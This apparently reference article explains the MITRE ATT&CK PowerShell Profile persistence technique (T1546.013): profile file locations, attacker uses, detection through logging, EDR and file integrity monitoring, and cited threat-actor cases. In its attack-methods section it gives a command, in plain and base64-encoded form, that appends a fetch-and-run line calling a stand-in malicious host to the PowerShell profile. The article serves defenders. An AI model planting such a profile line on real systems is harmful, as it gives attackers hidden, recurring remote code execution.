PowerShell Profile

Information

• Name: PowerShell Profile

• ID: T1546.013

• Tactics: TA0004, TA0003

• Technique: T1546

Introduction

The PowerShell Profile sub-technique (T1546.013) in the MITRE ATT&CK framework involves adversaries modifying or creating malicious PowerShell profiles to execute unauthorized commands or scripts automatically upon the launch of PowerShell. PowerShell profiles are scripts that run each time a PowerShell session starts, allowing users to customize their environment. Attackers exploit this functionality by embedding malicious commands or scripts within these profiles to achieve persistence, execute payloads, or maintain access to compromised systems without user interaction.

Deep Dive Into Technique

PowerShell profiles are scripts that are executed automatically whenever a new PowerShell session is initiated. These profiles can exist in multiple locations, including:

• System-wide profiles:

  • %windir%\System32\WindowsPowerShell\v1.0\profile.ps1

  • %windir%\SysWOW64\WindowsPowerShell\v1.0\profile.ps1

• User-specific profiles:

  • %UserProfile%\Documents\WindowsPowerShell\profile.ps1

  • %UserProfile%\Documents\PowerShell\profile.ps1

Attackers leverage these profiles by modifying existing scripts or creating new ones to execute malicious commands or payloads automatically. Common malicious actions include:

• Executing reverse shells or remote access trojans (RATs) upon PowerShell startup.

• Downloading and executing additional payloads from remote servers.

• Maintaining persistence by ensuring execution every time PowerShell is launched.

• Performing reconnaissance or data exfiltration silently in the background.

Attackers typically achieve this by:

1. Modifying or creating the profile script directly through command-line or scripting methods:

   Copy

   echo "Invoke-WebRequest -Uri 'http://malicious.example.com/payload.ps1' | Invoke-Expression" >> $profile

2. Obfuscating malicious commands within the profile script to evade detection:

   Copy

   $encodedCommand = 'cG93ZXJzaGVsbCAtbm9wcm9maWxlIC1jb21tYW5kICJJbnZva2UtV2ViUmVxdWVzdCAtVVJJIGh0dHA6Ly9tYWxpY2lvdXMuZXhhbXBsZS5jb20vcGF5bG9hZC5wc2wgfCBJbnZva2UtRXhwcmVzc2lvbiIK'
   powershell -EncodedCommand $encodedCommand

3. Utilizing administrative privileges to place malicious scripts into system-wide profiles, affecting all users on the system.

When this Technique is Usually Used

Attackers typically utilize the PowerShell Profile persistence method during the following attack scenarios and stages:

• Persistence Stage: After initial compromise, attackers embed malicious commands into PowerShell profiles to ensure continued access across system reboots and user logins.

• Privilege Escalation: If attackers gain administrative privileges, they may modify system-wide profiles, affecting all users and potentially escalating privileges further.

• Execution Stage: Malicious commands embedded in profiles often download and execute secondary payloads, facilitating lateral movement or data exfiltration.

• Defense Evasion: Attackers leverage PowerShell profiles to execute commands without directly invoking suspicious scripts or binaries, thus evading traditional detection mechanisms.

How this Technique is Usually Detected

Detection methods for malicious PowerShell profile modifications include:

• File Integrity Monitoring (FIM):

  • Monitoring profile scripts for unauthorized changes or creations.

  • Detecting unexpected modifications to %UserProfile%\Documents\WindowsPowerShell\profile.ps1 or system-wide profile locations.

• Endpoint Detection and Response (EDR) Solutions:

  • Monitoring PowerShell process creation events and associated script executions.

  • Alerting on suspicious PowerShell profile modifications or unusual execution patterns.

• PowerShell Logging and Auditing:

  • Enabling script block logging (Event ID 4104) to capture executed commands.

  • Enabling module logging (Event ID 4103) to log module and script invocations.

  • Monitoring Windows Event Logs for suspicious PowerShell activity.

• Behavioral Analysis:

  • Detecting anomalous PowerShell activity, such as connections to external IP addresses or domains immediately after PowerShell startup.

  • Identifying unusual parent-child process relationships involving PowerShell.

Indicators of Compromise (IoCs) include:

• Unexpected presence or modification of:

  • %UserProfile%\Documents\WindowsPowerShell\profile.ps1

  • %windir%\System32\WindowsPowerShell\v1.0\profile.ps1

• Suspicious encoded commands or obfuscated scripts within profile scripts.

• Unusual network connections initiated by PowerShell processes immediately upon launch.

Why it is Important to Detect This Technique

Early detection of malicious PowerShell profile modifications is critical due to the following impacts:

• Persistence and Long-Term Access:

  • Attackers leverage PowerShell profiles to maintain persistent access, potentially remaining undetected for extended periods.

• Privilege Escalation:

  • Malicious modifications to system-wide profiles can impact all users, facilitating privilege escalation and lateral movement.

• Data Exfiltration and Espionage:

  • Automated execution of malicious scripts enables attackers to silently exfiltrate sensitive data, intellectual property, or credentials.

• Defense Evasion:

  • PowerShell profile-based persistence methods often bypass traditional antivirus and signature-based detection systems, making them challenging to detect.

• Operational Impact:

  • Undetected malicious activities can lead to significant operational disruptions, data breaches, reputational damage, and regulatory compliance violations.

Therefore, promptly detecting and responding to unauthorized PowerShell profile modifications is essential to minimize potential damage and maintain the security posture of the organization.

Examples

Real-world examples and scenarios involving malicious PowerShell profile usage include:

• APT33 (Elfin):

  • Iranian threat actor known to leverage malicious PowerShell profiles for persistence.

  • Used PowerShell profiles to execute payloads that communicated with remote command-and-control (C2) servers, facilitating espionage activities.

• Empire Framework:

  • Popular post-exploitation framework that includes built-in modules for establishing persistence via PowerShell profiles.

  • Attackers using Empire often insert malicious commands into profiles to automatically reconnect compromised hosts to attacker-controlled infrastructure.

• FIN7 Group:

  • Cybercriminal group known for financial attacks targeting retail and hospitality sectors.

  • Utilized malicious PowerShell profiles to maintain persistence and execute payloads silently in victim environments, enabling lateral movement and data theft.

• Real-World Attack Scenario:

  1. An attacker gains initial access via phishing email containing a malicious attachment.

  2. Upon execution, the attacker modifies the user's PowerShell profile (profile.ps1) to include a command that downloads and executes a remote payload upon every PowerShell session start.

  3. Each time the victim opens PowerShell, the malicious payload executes silently, establishing persistent access and enabling further malicious actions such as data exfiltration or lateral movement.

These real-world examples demonstrate the practical application and potential impact of malicious PowerShell profile modifications, underscoring the importance of proactive detection and response strategies.